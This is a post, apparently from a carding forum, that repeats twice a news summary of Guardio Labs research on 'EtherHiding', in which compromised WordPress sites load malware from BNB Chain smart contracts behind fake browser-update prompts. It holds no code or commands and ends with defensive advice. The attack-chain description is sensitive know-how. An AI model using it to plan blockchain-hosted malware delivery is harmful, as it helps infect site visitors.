Carding 4 Carders
Professional
- Messages
- 2,724
- Reaction score
- 1,588
- Points
- 113
Cybercriminals use smart contracts on the BNB Chain network to hide and distribute malware, experts at Guardio Labs have discovered.
The researchers described in a report on a hacking technique called EtherHiding. The attack involves compromising websites running on the WordPress engine by injecting JavaScript code that further extracts payloads from contracts on the blockchain.
This is a modified method of the previously detected ClearFake campaign. Attackers posted code for the second stage of the attack on Cloudflare Workers, but the American company began blocking accounts, potentially hindering hacking attempts.
Hackers used the Web3 infrastructure from the Binance-supported BNB Chain network. This provided them with virtually free, "truly bulletproof hosting supported by the blockchain," the researchers emphasized.
Attackers can easily and cheaply change the code and, accordingly, the attack vector at their discretion.
In one of the methods discovered by experts, victims are asked to update their browser to access the requested content. When clicking on the link, the user downloads malware, infecting the computer from a domain controlled by hackers.
Attackers have the ability to modify the attack chain by changing the smart contract with a single blockchain transaction, the cost of which is approximately from $0.2 to $0.6.
Example of a BNB Chain contract that is constantly modified by hackers
Experts noted that once deployed on the network, contracts work independently, and all that BNB Chain developers can do is mark them as malicious. However, it is obvious that today there is no way to stop this path of hackers spreading their software, experts stressed.
Example of marking malicious contracts
According to them, WordPress sites serve as the main gateway for such attacks. Experts recommended that owners take all possible precautions, regularly updating plugins, changing passwords and simply "monitoring what is happening on the site."
The researchers noted that the use of blockchain poses new challenges to prevent the spread of malware, eliminating traditional blocking by the provider.
"While Web 3.0 portends innovation, attackers are constantly adapting, exploiting its benefits for nefarious purposes. As for Binance, we can't blame them, since the data is free for everyone, and everyone can check and detect the danger, " the experts concluded.
The researchers described in a report on a hacking technique called EtherHiding. The attack involves compromising websites running on the WordPress engine by injecting JavaScript code that further extracts payloads from contracts on the blockchain.
This is a modified method of the previously detected ClearFake campaign. Attackers posted code for the second stage of the attack on Cloudflare Workers, but the American company began blocking accounts, potentially hindering hacking attempts.
Hackers used the Web3 infrastructure from the Binance-supported BNB Chain network. This provided them with virtually free, "truly bulletproof hosting supported by the blockchain," the researchers emphasized.
Attackers can easily and cheaply change the code and, accordingly, the attack vector at their discretion.
In one of the methods discovered by experts, victims are asked to update their browser to access the requested content. When clicking on the link, the user downloads malware, infecting the computer from a domain controlled by hackers.
Attackers have the ability to modify the attack chain by changing the smart contract with a single blockchain transaction, the cost of which is approximately from $0.2 to $0.6.
Example of a BNB Chain contract that is constantly modified by hackers
Experts noted that once deployed on the network, contracts work independently, and all that BNB Chain developers can do is mark them as malicious. However, it is obvious that today there is no way to stop this path of hackers spreading their software, experts stressed.
Example of marking malicious contracts
According to them, WordPress sites serve as the main gateway for such attacks. Experts recommended that owners take all possible precautions, regularly updating plugins, changing passwords and simply "monitoring what is happening on the site."
The researchers noted that the use of blockchain poses new challenges to prevent the spread of malware, eliminating traditional blocking by the provider.
"While Web 3.0 portends innovation, attackers are constantly adapting, exploiting its benefits for nefarious purposes. As for Binance, we can't blame them, since the data is free for everyone, and everyone can check and detect the danger, " the experts concluded.
